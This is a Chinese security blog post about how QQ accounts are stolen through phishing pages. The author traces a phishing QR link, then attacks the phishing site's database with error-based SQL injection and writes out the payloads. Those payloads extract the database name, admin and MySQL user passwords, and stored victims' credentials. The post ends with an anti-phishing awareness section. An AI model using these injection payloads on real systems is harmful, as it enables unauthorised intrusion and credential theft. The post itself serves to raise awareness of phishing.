前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【实战】你的QQ就是这样被盗的|防范网络钓鱼

【实战】你的QQ就是这样被盗的|防范网络钓鱼

作者头像
天钧
发布2019-08-16 11:13:59
1.2K0
发布2019-08-16 11:13:59
举报
文章被收录于专栏:渗透云笔记

文章来自零釼实验室成员

南宫十六

文章共1906字24图

预计阅读时间5分钟

前言

以前在qq上就收到过朋友发来的二维码链接啥的,一般的套路就是诱导你扫描这个二维码或者点击这个链接。 例如某天爱玩吃鸡的你收到一条链接,标题是点击领取金币领皮肤领…然后你兴奋的不行,点开之后让你输入账号密码登录,你看着这个页面,没有发现半点可疑的地方,然后就把账号密码随手输了进去。不一会儿,你的qq提示在其他地方登录,然后你列表的好友就都收到了你发给他们的链接。又比如某天,你收到一条消息/一条空间留言,内容是:这个人的qq空间里怎么有你的照片?又或者是:这个人是谁?为什么他空间有你俩的合影?单纯善良好奇心又巨强的你瞬间懵了,同学?我和谁合过影啊?都忘了,赶紧去看看。但是你点击以后是个qq空间的页面让你登录,合情合理啊,毕竟是qq空间相册,那就登录呗,然后你qq就掉线了。 本文没啥技术含量,因为这几天正好碰到一个钓鱼网站,结合着真实的钓鱼网站打算给朋友们科普一下,提高一下防范意识。

起因

某个无聊的下午,正吃着西瓜刷着微博,突然收到一条QQ消息,吓得我赶紧放下了手中的西瓜… 是一个朋友发来的消息,内容如下:

那就扫一下呗,二维码直接拿到电脑上扫了一下,得到一个短网址

还原短网址得到一个链接

然后我们直接访问这个链接,会先出现一个电脑管家安全检测的页面,最终会跳转到真实钓鱼网站的页面。不得不说,这个安全检测过程做的还有模有样的,这个过程会让人们更容易相信这是一个安全的网站,减少顾虑,从而增加成功的概率。(如果在手机qq里面长按二维码识别,然后跳转到钓鱼网站页面的过程是看不到网站域名的,最终只有一个qq空间登录页面。)

正常情况下,输入qq号码和密码后跳转到QQ空间黄钻活动页面。

尝试攻击

前两天在FreeBuf上看到一个大佬对这类钓鱼网站的源码做了代码审计(传送门),正好拿这个网站练练手。无奈管理员登录界面根本找不到,猜了半天,最终发现有一个“后台”拼音缩写的目录,但是访问也跳转不到管理地址,又扫了一下,无果,遂放弃。

SQL注入漏洞

在对传递参数进行测试的过程中,发现密码输入框处存在SQL注入漏洞。 正常输入:

传递单引号报错:

此处的查询语句应该是

代码语言:javascript
复制
select * from qq where username='xxx' and password='xxx';

本来以为是Sqlmap一把梭的那种,结果跑一下就被waf封IP,那就手工呗。 报错注入,已知表名是qq,字段名是username,password 获取数据库名:

代码语言:javascript
复制
' and (extractvalue(1,concat(0x7e,(select database()),0x7e)))#

数据库名字为’db’,猜测管理员表名为admin,字段名同上

代码语言:javascript
复制
' and (extractvalue(1,concat(0x7e,(select username from db.admin),0x7e)))#

由于extractvalue()这几种报错注入的方法最多显示32位,所以可以用substring()分割一下

代码语言:javascript
复制
' and (extractvalue(1,concat(0x7e,(substring((select password from db.admin),1,16 )),0x7e)))#

拿数据库的密码时用了另外一种方法

代码语言:javascript
复制
' and (select 1 from (select count(*),concat('~',(select Password from mysql.user where host='127.0.0.1' limit 0,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a)b)#

查受害者的账号密码

代码语言:javascript
复制
' and (extractvalue(1,concat(0x7e,(select username from db.qq where id=1),0x7e,(select password from db.qq where id=1),0x7e)))#

本来还想试试load_file()读个配置文件啥的,后来发现是高版本的mysql,凉凉~

后续

你还想看后续???你们有啥想法和思路倒是可以交流一下~比如什么给他提交10万条假数据一类的…

科普时间

收集了几个网上公开的钓鱼网站源码,然后在本地搭建了一下,给大家看下效果。

QQ空间钓鱼

手机访问效果如下: 输入账号密码后跳转至真实的网站

此时后台就拿到了你输入的内容

游戏活动钓鱼

访问效果

业务活动页面钓鱼

后台收到账号信息

这个网站也是输入完账号密码跳转到真实的页面,我发现这个页面分毫不差,看对比图

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-08-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透云笔记 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 起因
  • 尝试攻击
  • SQL注入漏洞
  • 后续
  • 科普时间
    • QQ空间钓鱼
      • 游戏活动钓鱼
        • 业务活动页面钓鱼
        相关产品与服务
        数据库
        云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档